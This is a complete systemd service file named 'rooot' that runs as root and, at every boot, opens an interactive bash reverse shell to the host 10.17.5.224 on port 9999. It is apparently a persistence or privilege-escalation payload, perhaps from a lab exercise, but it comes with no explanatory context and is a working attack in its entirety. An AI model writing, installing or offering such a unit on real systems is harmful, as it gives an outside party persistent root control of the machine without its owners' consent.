[Unit]
Description=rooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.5.224/9999 0>&1'

[Install]
WantedBy=multi-user.target
